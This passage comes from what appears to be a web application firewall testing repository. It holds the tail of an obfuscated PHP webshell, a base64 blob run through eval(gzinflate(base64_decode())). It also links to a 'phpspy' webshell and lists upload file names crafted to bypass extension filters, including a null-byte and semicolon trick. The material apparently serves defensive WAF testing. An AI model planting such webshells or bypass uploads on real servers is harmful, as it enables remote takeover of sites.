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";
36 | eval(gzinflate(base64_decode($code)));
37 | ?>div></body>
38 | </html>


--------------------------------------------------------------------------------
/usecase/upload_content/webshell/phpspy.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hongxs/WAF-Tester2/b2535eb2dd94ae9a093cd9131cd2c510e9b5f30d/usecase/upload_content/webshell/phpspy.php


--------------------------------------------------------------------------------
/usecase/upload_ext.usecase:
--------------------------------------------------------------------------------
 1 | test.asp
 2 | test.asa
 3 | test.cer
 4 | test.jsp
 5 | test.php
 6 | test.php3
 7 | test.PhP
 8 | test.php.xx2.xxx3
 9 | test.asp;.jpg
10 | evil.asp0x00.jpg
11 | 


--------------------------------------------------------------------------------